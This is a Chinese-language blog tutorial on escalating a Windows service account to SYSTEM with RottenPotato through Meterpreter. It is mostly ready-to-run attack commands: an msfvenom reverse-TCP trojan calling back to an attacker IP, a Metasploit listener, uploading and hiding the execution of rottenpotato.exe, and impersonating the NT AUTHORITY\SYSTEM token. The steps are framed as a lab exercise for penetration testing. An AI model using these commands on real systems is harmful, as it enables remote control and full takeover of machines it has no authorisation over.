当前位置:   article > 正文

windows操作系统提权之服务提权实战rottenpotato_rottenpotato提权

rottenpotato提权
RottenPotato:
将服务帐户本地提权至SYSTEM
load incognito
list_tokens –u
upload /home/kali/Desktop rottenpotato.exe .
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\SYSTEM"
  1. load incognito

    • 这条命令用于加载 Metasploit 的 incognito 模块,该模块提供了一系列与 Windows 令牌操作相关的功能,比如令牌窃取、令牌操纵等。
  2. list_tokens –u

    • list_token 命令用于列出当前会话中可用的访问令牌。-u 参数指定列出用户令牌,这些令牌代表系统中不同用户的访问权限。
  3. upload /home/kali/Desktop rottenpotato.exe .

    • upload 命令用于将文件从攻击者的机器上传到目标机器。这里尝试上传 /root/rottenpotato.exe 文件到当前 Meterpreter 会话的工作目录。
    • 这条命令的意思是将位于 /home/kali/Desktop/ 目录下的 rottenpotato.exe 文件上传到 Meterpreter 会话的当前工作目录。如果当前工作目录是目标机器上的根目录,那么文件将被上传到那里
  4. execute -Hc -f rottenpotato.exe

    • execute 命令用于在目标机器上执行一个程序。-Hc 参数指定隐藏控制台窗口,-f 参数指定执行指定的文件(这里是 rottenpotato.exe)。
  5. impersonate_token "NT AUTHORITY\SYSTEM"

    • impersonate_token 命令用于模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM

Meterpreter 会话输出中,list_tokens -u 命令被用来列出当前会话中可用的用户令牌。下面是输出结果的解释:

  1. Delegation Tokens Available:

    • 这部分列出了可用于委派的令牌。委派令牌允许一个服务代表另一个服务执行操作,通常用于服务之间的信任关系。
    • 在这个例子中,有一个用户令牌属于 GOD\Administrator,这意味着目标机器上的 Administrator 用户账户的令牌是可用的,并且可以被用来进行令牌窃取或模拟。
  2. Impersonation Tokens Available:

    • 这部分列出了可用于模拟的令牌。模拟令牌允许一个进程以另一个用户的身份执行操作。
    • 在这个例子中,显示 "No tokens available",这意味着当前没有可用的模拟令牌。

当你在渗透测试或安全评估中使用 Meterpreter 时,这些信息非常有用,因为它们可以帮助你确定可以利用哪些账户的权限来提升你的会话权限或执行特定的任务。

具体流程

1.生成木马并放到win7上

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.130 LPORT=4444 -f exe >test.exe  

2.msfconsole进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.247.130
set LPORT 4444
exploit

3.加载 Metasploit 的 incognito 模块

load incognito

4.列出当前会话中可用的访问令牌

list_tokens –u

 5.将烂土豆从攻击者的机器上传到目标机器

upload /home/kali/Desktop rottenpotato.exe .

6.查看目录烂土豆是否上传成功 

7.将烂土豆执行

execute -Hc -f rottenpotato.exe

8. 模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM

impersonate_token "NT AUTHORITY\SYSTEM"

9. 再次列出当前会话中可用的访问令牌

list_tokens –u

与第四步对比少了一句

[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
证明已经提权成功

10.显示当前 Meterpreter 会话的运行用户(权限)

getuid

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/963514
推荐阅读
相关标签
  

闽ICP备14008679号